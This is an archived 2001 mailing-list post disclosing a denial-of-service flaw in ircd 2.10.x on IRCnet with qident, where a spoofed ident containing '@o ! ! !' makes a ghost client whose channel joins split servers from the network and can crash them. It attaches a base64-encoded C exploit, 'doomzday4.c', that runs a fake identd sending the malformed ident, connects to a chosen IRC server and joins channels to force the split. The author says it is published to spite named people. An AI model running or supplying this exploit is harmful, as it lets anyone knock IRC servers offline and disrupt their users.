This is a MIME encapsulated multipart message - please use a MIME-compliant e-mail program to open it. Dies ist eine mehrteilige Nachricht im MIME-Format - bitte verwenden Sie zum Lesen ein MIME-konformes Mailprogramm. --========GMXBoundary30582934072283 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit I dont think that has been posted before. There is a bug in ircd 2.10.x used in ircnet in conjunction with qident. DESCRIPTION ----------- qident does not check sucessfully for spaces and characters as like *, ! and @. When using an ident as like "@o ! ! !", o would be treated as host, the parameters which are left, would be enhanced by the number of spaces provided by the ident. If this ident is accepted, the connected client will become a ghost. This ghost is not successfully transmitted to the ircnetwork, thereful only visible on the server it connects. That would not be problematic, but the real problems occur, when the bogus idented client joins a channel. The join is not being rejected by the network and transfers the bogus ident with the parameters. Then, a "protocol error" occurs, the server is forced to split from the rest of the network. More problematic gets the fact, when the bogus client gets collided. This can lead to a denial of service crashing the ircd completely. FIXES ----- The opers had been informed quite a time ago, there are only some servers left which react on that bogus ident. EXPLOIT ------- Attached you will find a simple exploit, which starts an irc client with a spoofed ident. There should not run in.identd, while the exploit is used. Also, you have to be root (used for the bind). And it's written for linux. GREETINGS --------- especially to suffkopp and his friend newroot. those lamers forced me to make it public. so far, psychoid www.psychoid.lam3rz.de -- Sent through Global Message Exchange - http://www.gmx.net --========GMXBoundary30582934072283 Content-Type: text/plain; name="doomzday4.c" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="doomzday4.c" LyogRG9vTXpEYVkgdjQgLSBpcmNkIDIuMTAueC9pcmNuZXQgLSBleHBsb2l0CiAqIGZvciBsaW51 eCAtIHdyaXR0ZW4gYnkgcHN5Y2hvaWQgZnJvbSB0Y2wKICoKICogZ2VuZXJhbCB2dWxuZXJhYmls aXR5IGZvdW5kIGJ5IEhpcHBvCiAqIGEgZml4IGFscmVhZHkgaXMgYXZhaWxhYmxlLCBidXQgdGhl cmUgYXJlCiAqIGFsc28gaW5jb21wbGV0ZSBmaXhlcyBvdXQgdGhlcmUuCiAqCiAqIHRoaXMgc3Bs aXRzIGEgc2VydmVyIGZyb20gdGhlIG5ldHdvcmsuIFNpbXBsZSwgaXNudCBpdCA/CiAqCiAqIGlm IHlvdSByZWFsbHkgd2FudCB0byBydW4gdGhpcywgdGhlcmUgc2hvdWxkIG5vdCBydW4KICogYW4g aW4uaWRlbnRkIG9uIHlvdXIgbWFjaGluZS4gQWxzbywgeW91IG5lZWQgdG8gYmUgcm9vdC4KICoK ICogZXJtLCB0aGlzIGlzIGZvciBlZHVjYXRpb25hbCBwdXJwb3NlcyBvbmx5LiBFdmVuLCBpZiBu b29uZSBnZXRzCiAqIGh1cnQgKmcqLgogKi8gDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1 ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRk Yi5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUg PG5ldGluZXQvaW4uaD4KI2luY2x1ZGUgPG5ldGluZXQvaXAuaD4KI2luY2x1ZGUgPG5ldGluZXQv aXBfaWNtcC5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CiNpbmNsdWRlIDxzZXRqbXAuaD4NCiNp bmNsdWRlIDxzaWduYWwuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN5cy90aW1l Lmg+CgpqbXBfYnVmIGp1bXBiYWNrOw0KCnZvaWQgdGltZWRfb3V0KCBpbnQgc2lnICkgew0KICBs b25nam1wKCBqdW1wYmFjaywgMHgwICk7DQp9DQoKdm9pZCBmdWNrX2l0KGludCBzaWcpIHsKICBs b25nam1wKCBqdW1wYmFjaywgMHgwICk7DQp9CgppbnQgc2V0dGltZW91dCh1bnNpZ25lZCBzaG9y dCBzb2NraCwgdW5zaWduZWQgc2hvcnQgdGltZW91dCkgewogIGZkX3NldCByZmRzOwogIHN0cnVj dCB0aW1ldmFsIHR2OwogIEZEX1pFUk8oJnJmZHMpOwogIEZEX1NFVChzb2NraCwmcmZkcyk7CiAg dHYudHZfc2VjPXRpbWVvdXQ7CiAgdHYudHZfdXNlYz0wOwogIHNlbGVjdChzb2NraCsxLCZyZmRz LE5VTEwsTlVMTCwmdHYpOwogIGlmICghRkRfSVNTRVQoc29ja2gsJnJmZHMpKSB7CiAgICAgcmV0 dXJuIDA7CiAgfSBlbHNlIHsKICAgICByZXR1cm4gMTsKICB9ICAgICAKICAvKiByZXR1cm5zIDA9 dGltZW91dCBvciBlcnJvciwgMT1pbnB1dCB0aGVyZSAqLwp9Cg0KCnVuc2lnbmVkIGxvbmcgbG9v a3VwKGNoYXIgKmhvc3RuYW1lKQp7CiAgICBzdHJ1Y3QgaG9zdGVudCAqbmFtZTsKICAgIHVuc2ln bmVkIGxvbmcgaW50IGFkZHJlc3M7CiAgICAKICAgIGlmICgoYWRkcmVzcyA9IGluZXRfYWRkciho b3N0bmFtZSkpICE9IC0xKQoJcmV0dXJuIGFkZHJlc3M7CiAgICBpZiAoKG5hbWU9Z2V0aG9zdGJ5 bmFtZShob3N0bmFtZSkpID09IE5VTEwpCglyZXR1cm4gLTE7CiAgICBtZW1jcHkoJmFkZHJlc3Ms bmFtZS0+aF9hZGRyLG5hbWUtPmhfbGVuZ3RoKTsKICAgIHJldHVybiBhZGRyZXNzOwoKfQoKaW50 IHdyaXRlc29jayhpbnQgc29jayxjaGFyICpidWYpCnsKICAgIHdyaXRlKHNvY2ssYnVmLHN0cmxl bihidWYpKTsgICAgCn0KCmludCByZWFkc29jayhpbnQgc29jayxjaGFyICpidWYsaW50IHNpemUp CnsKICAgIGludCByYzsKICAgIGZkX3NldCByZmRzOwogICAgc3RydWN0IHRpbWV2YWwgdHY7CiAg ICBpbnQgY250OwogICAgbWVtc2V0KGJ1ZiwweDAsc2l6ZSk7CiAgICBjbnQ9MDsKICAgIGlmIChz ZXR0aW1lb3V0KHNvY2ssMSk9PTEpIHsKCWRvIHsKCSAgICByYz1yZWFkKHNvY2ssYnVmK2NudCwx KTsgICAgICAJCgkgICAgaWYgKHJjPT0wKSByZXR1cm4gcmM7CgkgICAgaWYgKHJjPT0tMSkgcmV0 dXJuIHJjOwoJICAgIGNudCsrOwoJfSB3aGlsZSAoYnVmW2NudC0xXSAhPSAnXG4nICYmIGJ1Zltj bnQtMV0gIT0gJ1xyJyAmJiBjbnQ8c2l6ZSk7CiAgICB9CiAgICByZXR1cm4gMDsKfQoKaW50IHNv Y2tjb25uZWN0KCB1bnNpZ25lZCBzaG9ydCB0aW1lb3V0LCB1bnNpZ25lZCBsb25nIGlQLCB1bnNp Z25lZCBzaG9ydCBwb3J0ICkgewogIGludCAgICAgICAgICAgICAgICBzb2NreTsNCiAgaW50IHdh c3JlYWQ7CiAgaW50IGN1cnJlbnRzb2NrOwogIHN0cnVjdCBzb2NrYWRkcl9pbiBhZGRyZXNzOw0K ICBzdHJ1Y3QgaG9zdGVudCAqYXRob3N0OwogIGNoYXIgbGFzb2NrWzB4MTAwXTsKICB1bnNpZ25l ZCBsb25nIHRpcDsKICB1bnNpZ25lZCBzaG9ydCBwcnQ7CiAgRklMRSAqc29ja3NsaXN0OwogIEZJ TEUgKmxhc3Rzb2NrOwogIA0KICBpZiAoKCBzb2NreSA9IHNvY2tldCggQUZfSU5FVCwgU09DS19T VFJFQU0sIDB4MCApKSA9PSAtMSApIHsNCiAgICByZXR1cm4gc29ja3k7DQogIH0NCiAgICANCiAg YWRkcmVzcy5zaW5fZmFtaWx5ICAgICAgPSBBRl9JTkVUOw0gCiAgYWRkcmVzcy5zaW5fcG9ydCAg ICAgICAgPSBodG9ucyggcG9ydCApOw0KICBhZGRyZXNzLnNpbl9hZGRyLnNfYWRkciA9IGlQOyAN CiAgc2lnbmFsKCBTSUdBTFJNLCB0aW1lZF9vdXQgKTsNCiAgYWxhcm0oMTApOyAgICAKCiAgaWYg KCBzZXRqbXAoIGp1bXBiYWNrICkgPT0gMHgwICkgew0KICAgIGlmICggY29ubmVjdCggc29ja3ks IChzdHJ1Y3Qgc29ja2FkZHIqKSgmYWRkcmVzcyksIHNpemVvZiggYWRkcmVzcyApKSkgew0KICAg ICAgIHNvY2t5ID0gLTE7DQogICAgfQ0KICB9IGVsc2UgeyBzb2NreSA9IC0xOyB9DQoKICBmZmx1 c2goc3Rkb3V0KTsgICAgICAgIA0KDSAgYWxhcm0gKDApOwogIHJldHVybiBzb2NreTsNCgp9Cgp2 b2lkIGJyb2tlbnBpcGUoKQp7CiAgICBwcmludGYoIkJyb2tlbiBQaXBlXG4iKTsKICAgIHJldHVy bjsKfQoKaW50IHRjcGNvbm5lY3QoIHVuc2lnbmVkIGxvbmcgIGlQLCANCiAgICAgICAgICAgICAg ICB1bnNpZ25lZCBzaG9ydCBwb3J0LCANCiAgICAgICAgICAgICAgICB1bnNpZ25lZCBzaG9ydCB0 aW1lb3V0ICkgew0KDQogIGludCAgICAgICAgICAgICAgICBzb2NreTsNCiAgc3RydWN0IHNvY2th ZGRyX2luIGFkZHJlc3M7DQogIHN0cnVjdCBzaWdhY3Rpb24gc3Y7CiAgc3RydWN0IGhvc3RlbnQg KmF0aG9zdDsKICBjaGFyIHRoYXRob3N0WzB4MTAwXTsKICBjaGFyIGJ1ZmZlcls1MTJdOwoNICBp bnQgdHJpZXMsIGxlbmd0aDsKICBzb2NreSA9IC0xOwogIHRyaWVzID0gMDsKCiAgc2lnZW1wdHlz ZXQoJnN2LnNhX21hc2spOwogIHN2LnNhX2hhbmRsZXI9YnJva2VucGlwZTsKICBzaWdhY3Rpb24o U0lHUElQRSwmc3YsTlVMTCk7ICAgIAoKLyogIGlmICgoYXRob3N0ID0gZ2V0aG9zdGJ5bmFtZSAo dGhhdGhvc3QpKSA9PSBOVUxMKSB7CiAgICAgcmV0dXJuIC0xOyAgICAgCiAgfSovCgogIGZmbHVz aChzdGRvdXQpOwogICBpZiAoKHNvY2t5ID0gc29ja2Nvbm5lY3QodGltZW91dCxpUCxwb3J0KSkg PT0gLTEpIHsKCWZwcmludGYoc3Rkb3V0LCJDb25uZWN0aW9uIHJlZnVzZWQuXG4iKTsKICAgICAg ICBzb2NreSA9IC0xOwogICAgICAgIHJldHVybiBzb2NreTsKICAgfQoKICBpZiAoc29ja3kgPT0g LTEpIHByaW50ZigiQ29ubmVjdGlvbiByZWZ1c2VkLlxuIik7ICAgIAogIGFsYXJtKCAweDAgKTsN CgogIHJldHVybiBzb2NreTsNCn0NCgoKaW50IGlyY2Rib29zdChjaGFyICpob3N0LCBpbnQgcG9y dCwgY2hhciAqbmljaykKewogICAgaW50IHNvY2s7CiAgICBjaGFyIGJ1ZlsyMDQ4XTsKICAgIGNo YXIgKnB0OwogICAgcHJpbnRmKCJTdGVwIDI6IENvbm5lY3RpbmcgdG8gdGhlIElSQyBTZXJ2ZXIu XG4iKTsKICAgIHNvY2s9dGNwY29ubmVjdChsb29rdXAoaG9zdCkscG9ydCwxMCk7CgogICAgaWYg KHNvY2s9PS0xKSB7CglwcmludGYoIkVycm9yOiBjYW50IGNvbm5lY3RcbiIpOwoJZXhpdCgweDAp OwogICAgfQogICAgcHJpbnRmKCJTdGVwIDM6IENvbm5lY3RlZC4uIHNlbmRpbmcgdXNlciAvIGpv aW5cbiIpOwogICAgLyogdGhlIHN0YXIgaXMgdmVyeSB2ZXJ5IGltcG9ydGFudCAqLwogICAgd3Jp dGVzb2NrKHNvY2ssIlVTRVIgbyBhIGEgOmFcclxuIik7CiAgICBzbnByaW50ZihidWYsc2l6ZW9m KGJ1ZiksIk5JQ0sgJXNcclxuIixuaWNrKTsKICAgIHdyaXRlc29jayhzb2NrLGJ1Zik7CiAgICBz bnByaW50ZihidWYsc2l6ZW9mKGJ1ZiksIldIT0lTIGtibm4lZFxyXG4iLGxvb2t1cChob3N0KSk7 CiAgICB3cml0ZXNvY2soc29jayxidWYpOwogICAgLyogdGhpcyBqb2lucyBhcmUgbmVlZGVkIHRv IGJyb2FkY2FzdCB0aGUgdXNlciB0byB0aGUgY29ubmVjdGVkIHNlcnZlcnMgKi8KICAgIHdyaXRl c29jayhzb2NrLCJKT0lOICNzZXhcclxuIik7IC8qIHllYWgsIHJpZ2h0ICovCiAgICB3cml0ZXNv Y2soc29jaywiSk9JTiAjc2hvd2Rvd25cclxuIik7IC8qIHllYWgsIHJpZ2h0ICovCiAgICB3cml0 ZXNvY2soc29jaywiSk9JTiAjZnVuZmFjdG9yeVxyXG4iKTsgLyogeWVhaCwgcmlnaHQgKi8KICAg IHdyaXRlc29jayhzb2NrLCJKT0lOICN1c2FcclxuIik7IC8qIHllYWgsIHJpZ2h0ICovCiAgICB3 cml0ZXNvY2soc29jaywiSk9JTiAjZmxpcnQuZGVcclxuIik7IC8qIHllYWgsIHJpZ2h0ICovCiAg ICB3cml0ZXNvY2soc29jaywiSk9JTiAwXHJcbiIpOyAvKiB5ZWFoLCByaWdodCAqLwogICAgcHJp bnRmKCJTdGVwIDQ6IFBsZWFzZSBwcmVzcyBjb250cm9sK2JyZWFrIHRvIHJlbGVhc2UgdGhlIHNw bGl0LlxuIik7CiAgICB3aGlsZSAocmVhZHNvY2soc29jayxidWYsc2l6ZW9mKGJ1ZikpID49MCkK ICAgIHsKCXB0PXN0cnN0cihidWYsIlBJTkciKTsKCWlmIChwdD09YnVmKQoJewoJICAgIHdyaXRl c29jayhzb2NrLCJQT05HIDpQUFBcclxuIik7Cgl9CglwdD1zdHJzdHIoYnVmLCJFUlJPUiIpOwoJ aWYgKHB0PT1idWYpIGJyZWFrOwoJcHJpbnRmKGJ1Zik7CiAgICB9CiAgICBjbG9zZShzb2NrKTsK fQoKaW50DQptYWluIChpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQogIGludCBsaXN0ZW5zb2Nr ZXQsIGluc29ja2V0LCBvdXRzb2NrZXQ7DQogIHNob3J0IGxpc3RlbnBvcnQsIGRlc3Rwb3J0Ow0K ICBzdHJ1Y3QgaG9zdGVudCAqc29ja3NfaGUsICpkZXN0X2hlOw0KICBzdHJ1Y3Qgc29ja2FkZHJf aW4gbGlzdGVuX3NhLCBzb2Nrc19zYTsNCiAgY2hhciBidWZbMjAwXTsKICBpbnQgc29wdHMgPSAx LCBtYXhmZDsNCiAgY2hhciBjWzEwMF07CiAgY2hhciAqcG87CiAgaW50IGxlbmd0aDsNCiAgaW50 IGNudDsKICBpbnQgcmM7CiAgaW50IGxwb3J0LGZwb3J0OwogIGZkX3NldCByZmRzOw0KICBscG9y dD0gMDsgZnBvcnQgPTA7ICAgIAoKICBwcmludGYoIlxuRG9vTXpEYVkgdjQgLSBieSBwc3ljaG9p ZFxuIik7CiAgcHJpbnRmKCJleHBsb2l0cyBhIGJ1ZyBpbiB0aGUgaXJjZCBpZGVudCByZXF1ZXN0 IG9mIGlyY2QgMi4xMC54XG4iKTsKDQogIGlmIChhcmdjICE9IDQpDQogICAgew0KICAgICAgcHJp bnRmICgiVXNhZ2U6ICVzIGlyY3NlcnZlciBwb3J0IG5pY2tcbiIsIGFyZ3ZbMF0pOw0KICAgICAg cHJpbnRmICgiRXhhbXBsZTogJXMgY2hhdC5idC5uZXQgNjY2OSBraWxsYWhcblxuIiwgYXJndlsw XSk7CiAgICAgIGV4aXQgKDEpOw0KICAgIH0NCgogIHByaW50ZigiU2V0dGluZyB1cC4uXG4iKTsK DQogIGxpc3RlbnBvcnQgPSAxMTM7DQoNCiAgbGlzdGVuc29ja2V0ID0gc29ja2V0IChBRl9JTkVU LCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApOw0KICBzZXRzb2Nrb3B0IChsaXN0ZW5zb2NrZXQs IFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgJnNvcHRzLCBzaXplb2YgKGludCkpOw0KDQogIG1l bXNldCAoJmxpc3Rlbl9zYSwgMCwgc2l6ZW9mIChzdHJ1Y3Qgc29ja2FkZHJfaW4pKTsNCg0KICBs aXN0ZW5fc2Euc2luX3BvcnQgPSBodG9ucyAobGlzdGVucG9ydCk7DQogIGxpc3Rlbl9zYS5zaW5f YWRkci5zX2FkZHIgPSBodG9ubCAoSU5BRERSX0FOWSk7DQoNCiAgc29ja3Nfc2Euc2luX3BvcnQg PSBodG9ucyAoZGVzdHBvcnQpOw0KDQogIGlmICgoYmluZCAobGlzdGVuc29ja2V0LCAoc3RydWN0 IHNvY2thZGRyICopICZsaXN0ZW5fc2EsIHNpemVvZiAoc3RydWN0IHNvY2thZGRyX2luKSkpID09 IC0xKQ0KICAgIHsNCiAgICAgIHBlcnJvciAoImJpbmQiKTsNCiAgICAgIGV4aXQgKDEpOw0KICAg IH0NCiAgaWYgKChsaXN0ZW4gKGxpc3RlbnNvY2tldCwgMSkpID09IC0xKQ0KICAgIHsNCiAgICAg IHBlcnJvciAoImxpc3RlbiIpOw0KICAgICAgZXhpdCAoMSk7DQogICAgfQ0KDSAgcmM9Zm9yaygp OwogIGlmIChyYyA9PTApIHsKICAgICBwcmludGYoIlxuU3RlcCAxOiBTdGFydGluZyBpZGVudGRc biIpOwogICAgIHNsZWVwKDIpOyAvKiB0aGUgZGVtb24gc2hvdWxkIHJlYWxseSBydW4gKi8KICAg ICBpcmNkYm9vc3QoYXJndlsxXSxhdG9pKGFyZ3ZbMl0pLGFyZ3ZbM10pOwogICAgIGV4aXQoMHgw KTsgICAgCiAgfSAgICAgCmdlZToKICBzbGVlcCgxKTsKICBwcmludGYoIiAgICAgICAgSWRlbnRk IHN0YXJ0ZWQuLiBsaXN0ZW5pbmcuXG4iKTsKICBpbnNvY2tldCA9IGFjY2VwdCAobGlzdGVuc29j a2V0LCBOVUxMLCAwKTsNCiAgaWYgKGluc29ja2V0ID09IC0xKQ0KICAgIHsNCiAgICAgIHBlcnJv ciAoImFjY2VwdCIpOw0KICAgICAgZXhpdCAoMSk7DQogICAgfQ0KCiAgd2hpbGUgKDEpDQogICAg ew0KICAgICAgbWVtc2V0KGMsMHgwLHNpemVvZihjKSk7CiAgICAgIEZEX1pFUk8gKCZyZmRzKTsN CiAgICAgIEZEX1NFVCAoaW5zb2NrZXQsICZyZmRzKTsNCiAgICAgIHNlbGVjdCAoaW5zb2NrZXQr MSwgJnJmZHMsIE5VTEwsIE5VTEwsIE5VTEwpOw0KICAgICAgaWYgKEZEX0lTU0VUIChpbnNvY2tl dCwgJnJmZHMpKQ0KICAgICAgICB7DQoJICBsZW5ndGggPSByZWN2IChpbnNvY2tldCwgYywgMTAw LCAwKTsNCgkgIGlmIChsZW5ndGggPT0gLTEgfHwgbGVuZ3RoID09IDApDQoJICAgIGJyZWFrOw0K CSAgc3NjYW5mKGMsIiAlZCAsICVkIiwgJmxwb3J0LCAmZnBvcnQpOwoJICBzbnByaW50ZihidWYs c2l6ZW9mKGJ1ZiksIiVkICwgJWQgOiBVU0VSSUQgOiBVTklYIDogQG8gISAhICEgISAhICEgXHJc biIsbHBvcnQsZnBvcnQpOwoJICBwcmludGYoIlxuSWRlbnQgOiAlc1xuIixidWYpOwoJICAvKiBz ZW5kaW5nIGl0IGEgc2Vjb25kIHRpbWUgYmVjYXVzZSBvZiB0aGUgbGFtZSAxc3QgcGF0Y2ggKi8K CSAgc2VuZChpbnNvY2tldCxidWYsc3RybGVuKGJ1ZiksMCk7CgkgIHNucHJpbnRmKGJ1ZixzaXpl b2YoYnVmKSwiOiBVU0VSSUQgOiBVTklYIDogQG8gISAhICEgISAhICEgXHJcbiIpOwoJICBwcmlu dGYoIlxuSWRlbnQgOiAlc1xuIixidWYpOwoJICBzZW5kKGluc29ja2V0LGJ1ZixzdHJsZW4oYnVm KSwwKTsKCSAgYnJlYWs7Cgl9DQogICAgfQ0KICBzbGVlcCgxKTsKICBjbG9zZSAoaW5zb2NrZXQp Ow0KICBjbG9zZSAobGlzdGVuc29ja2V0KTsKICB3YWl0KDApOwogIGV4aXQoMHgwKTsKfQ0KCg== --========GMXBoundary30582934072283--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:55:46 PDT